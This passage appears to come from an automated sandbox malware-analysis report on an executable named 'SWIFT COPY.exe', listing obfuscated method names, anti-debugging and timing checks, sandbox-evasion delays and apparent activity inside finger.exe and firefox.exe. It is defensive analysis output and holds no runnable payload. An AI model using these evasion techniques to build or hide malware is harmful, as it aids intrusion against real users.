                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, pgOolZTETHev4y8l3L.csHigh entropy of concatenated method names: 'BL0WpxPWCr', 'YdEWMgaet4', 'MHxWJuqSf0', 'yq9WT3J9V7', 'mugWGNLI95', 'XpuWm30WUo', 'Ya0WrrZS9a', 'l18Wv0Np8g', 'i3qWVI1WNP', 'QjZWLdO7Db'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ngHNgwPPjJV6Lt7hwqE.csHigh entropy of concatenated method names: 'dHOL0dqFtp', 'wI5LzflbHl', 'e5F7IUkfWr', 'FDW7PBn3Pa', 'Ixe71IBPpR', 'saE7tC9p5F', 'jgN78iquZi', 'dAK76e5Cf4', 'Hok7A3MKwS', 'V8V7KHLQ6K'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, JX1AgVop2XP58dnRsU.csHigh entropy of concatenated method names: 'FpjqkFOY44', 'mMgq2KgvVS', 'pksqjGFZBG', 'kuWqpuxCFl', 'hDYqQi4ysO', 'uvdqMJnTeE', 'n7BqhdUZ1l', 'NUQqJ0csLA', 'fKYqT4YFgY', 'nUcqddYrWu'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, GXDUQXSxvOdGW2xpWV.csHigh entropy of concatenated method names: 'v58qAC8jMW', 'yJCqW8RhtB', 'HWVqFgKsGk', 'dsxF0okuos', 'S2FFzCjrlQ', 'XQYqI7Ryyg', 'y0VqPp3cpY', 'ogKq1RYrDS', 'IIuqtPLmmm', 'k4Bq8U4Gyt'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, kevnhJKpftn38XCllX.csHigh entropy of concatenated method names: 'Dispose', 'e1tPXKOt48', 'FEa1fVPHJk', 'd7wtRRMqgr', 'w5nP0Gsl5q', 'oTgPz3useE', 'ProcessDialogKey', 'VE61IcxAhM', 'AK71PU6ey0', 'gYW11RPQcB'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, tdj7d88J2lr2blLl6y.csHigh entropy of concatenated method names: 'JLhPqkhZDf', 'RAqPNSUsrA', 'QETP4Hev4y', 'dl3PiLyUS1', 'RpKPGxFJmm', 'znCPml1ys8', 'uWxpuixyik2Z8h6moH', 'V3vKyBwb8uyVx6DdgY', 'D6WPPZ29jM', 'AjBPtMnvwc'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, SUS1Y7d06todxRpKxF.csHigh entropy of concatenated method names: 'n4RYQnAofO', 'SOWYh6MIdj', 'EOFWBJngle', 'nUwWD7HfWB', 'uGIWCdk1xm', 'zj4W3g07yt', 'eqZWSV3B2J', 'KAPWO77sS1', 'TVIWoPLcYu', 'QwaWgeY98R'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, fmQfxYH8J5TSNfKiWf.csHigh entropy of concatenated method names: 'LRHr4Txl41', 'UvdriJaETU', 'ToString', 'C37rAD6vXF', 'df8rKNK3du', 'txxrWHpk9m', 'LMLrY8d0iW', 'T9ArF6o3EW', 'vZCrqyMal0', 'y4SrNblDuN'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ANnFHbfW0Do6vnXHF0.csHigh entropy of concatenated method names: 'Cp0GXJClKONR1pnlNcw', 'CItZpdC1DdVxeuIA0xl', 'z6yFvEF3SQ', 'hRKFVeiex5', 'WoLFLomen4', 'dgbXDsCRfUoultkHHBX', 'KfVSaJCtw9YEGlvvcgI'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, CkhZDfJRAqSUsrAlWc.csHigh entropy of concatenated method names: 'GiTKR1kmc1', 'd3tK5noqpj', 'MruKyaB0bg', 'lpTKHXw6oc', 'oUmKnFR7gI', 'jeEKs8rake', 'yUyKUqogDy', 'Wg3Kl0rOe9', 'nJAKXCvFj2', 'pMHK0Rv4ei'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, bTxYwBPIS41pIrFLa9k.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tU2LuqcTpn', 'BvLLwW2rbU', 'PF1LZMGJMs', 'nUNLRTLav1', 'EbML5amghQ', 'B7BLy9S9FT', 'kTuLH6W2g2'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, uVBRfg13TDMbJMd0Fp.csHigh entropy of concatenated method names: 'J9sjJvQvR', 'abap54fvr', 'wYlMVnCNb', 'K9ohPXmZ2', 'mwDTUf8nx', 'xC2dfEH5o', 'VeaT8sZQMpUel4qmBr', 'T6Sv1D2JsV5X4q6FAT', 'SRrvADwKh', 'jwfL5wlgE'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, rAtFfJzSo8Tf2AFjuv.csHigh entropy of concatenated method names: 'fUlLMujlNR', 'PCULJNJh0R', 'eVhLTJj8eR', 'mOsLcBmLPZ', 'A9fLfir67b', 'ghELDuLpJS', 'nBDLC6spf7', 'sWpLxKksHK', 'Cx2LkgJxWs', 'pF2L2sasFy'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csHigh entropy of concatenated method names: 'W36t6KgUgy', 'wuWtAd9gPW', 'VALtKmAEvx', 'lhFtW05bGf', 'GUttYGFA3S', 'htjtFKYjHb', 'xN7tqyUk31', 'hALtNsEgTf', 'iLKta9U8PU', 'j81t4NCrFY'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, DmmpnCcl1ys8cOY6PB.csHigh entropy of concatenated method names: 'YeCF6hjxX4', 'gmTFKjVSA9', 'lrsFYMtkr8', 'iZnFqj9C8c', 'xO5FNZDKIP', 'TpCYn7wQpH', 'ltjYsU12nF', 'f8LYUeAS9o', 'kWcYlMylLt', 'fCuYXTA4jD'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, LJ6VphyIn8SWBcejBx.csHigh entropy of concatenated method names: 'ToString', 'GvomuNipYL', 'g8qmfrDS1O', 'pp1mBpj3RC', 'DA2mDgxZb6', 'wpUmCQJmFW', 'b4Cm3HKEFW', 'bnOmS2mjZd', 'VrAmOcnfbQ', 'IAvmoayxvZ'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, PRVwXMUYh81tKOt48b.csHigh entropy of concatenated method names: 'g5IVGJ7MIZ', 'UKdVrUsb2B', 'NfRVVgUH8B', 'hKgV7niOp3', 'wALVEXWytf', 'kttVxpay4g', 'Dispose', 'g81vAsP1A3', 'wMkvKhW3N6', 'dclvWndEKi'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, ecxAhMXQK7U6ey0KYW.csHigh entropy of concatenated method names: 'xonVc0D3vd', 'ty7VfYSdDj', 'lJtVBqpYSw', 'qsqVDoaDnU', 'DPRVC4OCq3', 'yYYV3V19MG', 'X4iVSf0mpP', 'lb6VOog6NG', 'LSjVoGF7Cs', 'If4VgtB8Ep'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, RPQcBL0VyD2jnWdrsj.csHigh entropy of concatenated method names: 'HyLLWxyvFG', 'O8wLYSfcZy', 'vNpLFDjahn', 'eumLqCf8c8', 'lnlLV5eZdd', 'F4QLNwIKq8', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, zGpwFgRlKTSAnOF1F7.csHigh entropy of concatenated method names: 'nrrGgxNtPE', 'QiNGwqOorF', 'S15GRSoZZo', 'TBwG57GFpc', 'iuXGfFAifO', 'ljmGBrPosU', 'LpKGDoAT2n', 'G0VGCYux8t', 'C3lG30Ld4Y', 'Ix3GSbDGdo'
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, cIHBcuZsAj7mNaqAYt.csHigh entropy of concatenated method names: 'PEG9J385JR', 'nox9TJ8W5B', 'dE79cF2iZB', 'KTR9fOWpDi', 'EWk9DvmOi6', 'GHm9Ciuivl', 'aAC9SoMWfr', 'He99O1mww9', 'AYP9g4LUFI', 'TbA9uDTfGY'
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: SWIFT COPY.exe PID: 7404, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 5170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 6170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 62A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 72A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: B4B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: C4B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: C940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: D940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: EB40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: FB40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: 10B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E rdtsc 3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\SWIFT COPY.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 8048Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 8048Thread sleep time: -74000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe TID: 8108Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0288C7B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0288C7B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A0E000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000002.3579026296.000000000140F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2525369322.000001872CEBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E rdtsc 3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00417813 LdrLoadDll,3_2_00417813
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01360124 mov eax, dword ptr fs:[00000030h]3_2_01360124
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404164 mov eax, dword ptr fs:[00000030h]3_2_01404164
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404164 mov eax, dword ptr fs:[00000030h]3_2_01404164
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DA118 mov ecx, dword ptr fs:[00000030h]3_2_013DA118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DA118 mov eax, dword ptr fs:[00000030h]3_2_013DA118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DA118 mov eax, dword ptr fs:[00000030h]3_2_013DA118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DA118 mov eax, dword ptr fs:[00000030h]3_2_013DA118
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F0115 mov eax, dword ptr fs:[00000030h]3_2_013F0115
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov ecx, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov ecx, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov ecx, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov eax, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DE10E mov ecx, dword ptr fs:[00000030h]3_2_013DE10E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C156 mov eax, dword ptr fs:[00000030h]3_2_0132C156
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C8158 mov eax, dword ptr fs:[00000030h]3_2_013C8158
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336154 mov eax, dword ptr fs:[00000030h]3_2_01336154
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336154 mov eax, dword ptr fs:[00000030h]3_2_01336154
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C4144 mov eax, dword ptr fs:[00000030h]3_2_013C4144
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C4144 mov eax, dword ptr fs:[00000030h]3_2_013C4144
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C4144 mov ecx, dword ptr fs:[00000030h]3_2_013C4144
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C4144 mov eax, dword ptr fs:[00000030h]3_2_013C4144
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C4144 mov eax, dword ptr fs:[00000030h]3_2_013C4144
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B019F mov eax, dword ptr fs:[00000030h]3_2_013B019F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B019F mov eax, dword ptr fs:[00000030h]3_2_013B019F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B019F mov eax, dword ptr fs:[00000030h]3_2_013B019F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B019F mov eax, dword ptr fs:[00000030h]3_2_013B019F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A197 mov eax, dword ptr fs:[00000030h]3_2_0132A197
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A197 mov eax, dword ptr fs:[00000030h]3_2_0132A197
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A197 mov eax, dword ptr fs:[00000030h]3_2_0132A197
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014061E5 mov eax, dword ptr fs:[00000030h]3_2_014061E5
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01370185 mov eax, dword ptr fs:[00000030h]3_2_01370185
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EC188 mov eax, dword ptr fs:[00000030h]3_2_013EC188
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EC188 mov eax, dword ptr fs:[00000030h]3_2_013EC188
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4180 mov eax, dword ptr fs:[00000030h]3_2_013D4180
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4180 mov eax, dword ptr fs:[00000030h]3_2_013D4180
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013601F8 mov eax, dword ptr fs:[00000030h]3_2_013601F8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE1D0 mov eax, dword ptr fs:[00000030h]3_2_013AE1D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE1D0 mov eax, dword ptr fs:[00000030h]3_2_013AE1D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_013AE1D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE1D0 mov eax, dword ptr fs:[00000030h]3_2_013AE1D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE1D0 mov eax, dword ptr fs:[00000030h]3_2_013AE1D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F61C3 mov eax, dword ptr fs:[00000030h]3_2_013F61C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F61C3 mov eax, dword ptr fs:[00000030h]3_2_013F61C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6030 mov eax, dword ptr fs:[00000030h]3_2_013C6030
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A020 mov eax, dword ptr fs:[00000030h]3_2_0132A020
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C020 mov eax, dword ptr fs:[00000030h]3_2_0132C020
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E016 mov eax, dword ptr fs:[00000030h]3_2_0134E016
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E016 mov eax, dword ptr fs:[00000030h]3_2_0134E016
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E016 mov eax, dword ptr fs:[00000030h]3_2_0134E016
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E016 mov eax, dword ptr fs:[00000030h]3_2_0134E016
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B4000 mov ecx, dword ptr fs:[00000030h]3_2_013B4000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D2000 mov eax, dword ptr fs:[00000030h]3_2_013D2000
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135C073 mov eax, dword ptr fs:[00000030h]3_2_0135C073
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332050 mov eax, dword ptr fs:[00000030h]3_2_01332050
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6050 mov eax, dword ptr fs:[00000030h]3_2_013B6050
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F60B8 mov eax, dword ptr fs:[00000030h]3_2_013F60B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F60B8 mov ecx, dword ptr fs:[00000030h]3_2_013F60B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013280A0 mov eax, dword ptr fs:[00000030h]3_2_013280A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C80A8 mov eax, dword ptr fs:[00000030h]3_2_013C80A8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133208A mov eax, dword ptr fs:[00000030h]3_2_0133208A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C0F0 mov eax, dword ptr fs:[00000030h]3_2_0132C0F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013720F0 mov ecx, dword ptr fs:[00000030h]3_2_013720F0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0132A0E3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013380E9 mov eax, dword ptr fs:[00000030h]3_2_013380E9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B60E0 mov eax, dword ptr fs:[00000030h]3_2_013B60E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B20DE mov eax, dword ptr fs:[00000030h]3_2_013B20DE
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0140634F mov eax, dword ptr fs:[00000030h]3_2_0140634F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C310 mov ecx, dword ptr fs:[00000030h]3_2_0132C310
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01350310 mov ecx, dword ptr fs:[00000030h]3_2_01350310
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A30B mov eax, dword ptr fs:[00000030h]3_2_0136A30B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A30B mov eax, dword ptr fs:[00000030h]3_2_0136A30B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A30B mov eax, dword ptr fs:[00000030h]3_2_0136A30B
